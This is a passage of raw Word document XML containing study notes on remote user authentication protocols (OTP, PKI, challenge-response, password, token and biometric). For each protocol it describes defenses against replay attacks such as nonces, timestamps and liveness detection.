          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: To defend against replay attacks in OTP authentication, the following measures can be employed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCAF39" w14:textId="48FF31A3" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Incorporating a challenge-response mechanism: The server can generate a random challenge and send it to the client. The client combines the challenge with the OTP to create a response that is unique to that specific challenge and session. The server verifies the response and ensures that it corresponds to the expected challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0120042C" w14:textId="49264D4B" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using time synchronization: Time-based OTPs change frequently, typically every 30 or 60 seconds. The server and client must be synchronized in terms of time to ensure the proper </w:t>
      </w:r>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>validation of OTPs. Replay attacks are mitigated because the OTPs quickly become invalid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6974AE" w14:textId="169D2599" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Public Key Infrastructure (PKI) Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B81BCD" w14:textId="2F8D4770" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description: PKI authentication utilizes asymmetric encryption and digital certificates to verify the authenticity of remote users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA558C" w14:textId="155A6AC2" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: To defend against replay attacks in PKI authentication, the following measures can be implemented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE5F1B" w14:textId="6885C88C" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Including a nonce: The server can include a unique nonce (a random value) in the authentication challenge. The client signs the challenge, including the nonce, with its private key. The server verifies the signature and the uniqueness of the nonce, ensuring that the authentication response is not a replayed message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6B88C2" w14:textId="5D6C75B1" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Using timestamps: The server can include a timestamp in the authentication challenge. The client signs the challenge, including the timestamp, with its private key. The server verifies that the timestamp is recent and that the authentication response is not a replay of an older message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBE629" w14:textId="1D190885" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Challenge-Response Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468A224" w14:textId="2FF08247" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description: Challenge-response authentication involves the server sending a random challenge to the client, and the client responding with a computed response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2ADBE" w14:textId="00378D55" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: To defend against replay attacks in challenge-response authentication, the following measures can be employed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E359A5E" w14:textId="37C854FA" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Using a one-time challenge: The server can generate a unique challenge for each authentication attempt. The client computes a response based on the challenge and other parameters, ensuring that the response cannot be reused for subsequent authentication attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70D70F" w14:textId="74C636F1" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Employing timestamps or sequence numbers: The server can include a timestamp or a sequence number in the challenge. The client includes the timestamp or sequence number in the response, and the server verifies its freshness and uniqueness to detect and prevent replay attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7336AD5D" w14:textId="26F8BB52" w:rsidR="007212E8" w:rsidRDefault="007212E8" w:rsidP="007212E8">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Challenge Response Protocols for Remote User Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F370DC2" w14:textId="3EEA43A3" w:rsidR="007212E8" w:rsidRDefault="007212E8" w:rsidP="007212E8">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="007212E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Protocol for a Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C319D4E" w14:textId="22BF3AAC" w:rsidR="007212E8" w:rsidRDefault="007212E8" w:rsidP="007212E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007212E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password-based Authentication Protocol (e.g., Username-Password Protocol): The user provides a username and a corresponding password to the remote system. The server verifies the provided credentials against its stored database of usernames and hashed passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3AA716" w14:textId="4B8E9B5D" w:rsidR="007212E8" w:rsidRDefault="007212E8" w:rsidP="007212E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007212E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: To defend against replay attacks in a password-based authentication protocol, you can incorporate the following measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB164D" w14:textId="675145D3" w:rsidR="007212E8" w:rsidRDefault="007212E8" w:rsidP="007212E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007212E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Challenge-Response Mechanism: The server can generate a random challenge and send it to the client. The client combines the challenge with the password to compute a response. The response is unique to that specific challenge and cannot be reused in subsequent login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0A4FE" w14:textId="18842655" w:rsidR="007212E8" w:rsidRDefault="007212E8" w:rsidP="007212E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007212E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Timestamps: The server can include a timestamp in the challenge or as part of the authentication process. The server verifies that the timestamp is recent, ensuring that the authentication request is not a replay of an older message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF49BF" w14:textId="25CCF7D7" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Protocol for a Token:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434CC4C8" w14:textId="25D8F5BB" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>One-Time Password (OTP) Authentication Protocol: A token is typically a hardware device or a mobile application that generates a unique password (OTP) for each login attempt. The server and the token are synchronized, and the generated OTP is verified by the server during the authentication process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57BE02" w14:textId="1A98A652" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: To defend against replay attacks in a token-based authentication protocol, you can employ the following measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3167CF" w14:textId="618E1FF9" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Time-Synchronized Tokens: The token and the server need to be time-synchronized. The token generates one-time passwords (OTPs) that change at fixed time intervals (e.g., every 30 seconds). The server validates the received OTP by checking its validity within a certain time window. This ensures that OTPs quickly become invalid, preventing replay attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246D7C49" w14:textId="50378F93" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Protocol for Static Biometric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8BC9F9" w14:textId="675646AB" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biometric Authentication Protocol: In a static biometric protocol, such as fingerprint recognition, the user's biometric data (e.g., fingerprint image) is captured and stored during enrollment. During authentication, the user's presented biometric sample is compared against the stored template using matching algorithms to determine a match or non-match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E1EF9A" w14:textId="4B6816FF" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: Defending against replay attacks in static biometric protocols can be challenging since the captured biometric data remains constant. However, you can consider the following measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73471345" w14:textId="3914D1CC" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Liveness Detection: Implement liveness detection mechanisms to verify that the presented biometric sample is from a live person and not a replayed recording. This can involve requiring the user to perform specific actions during the biometric capture process, such as blinking or speaking certain phrases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC15C51" w14:textId="5C9F26B2" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Challenge-Response Mechanism: Similar to other protocols, you can incorporate a challenge-response mechanism where the server sends a random challenge to the client, and the client combines the challenge with the biometric data to compute a response. The response is unique to that specific challenge and prevents replay attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C4F7B" w14:textId="7AD32BBD" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Protocol for Dynamic Biometric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241FAA2" w14:textId="0EFC4880" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
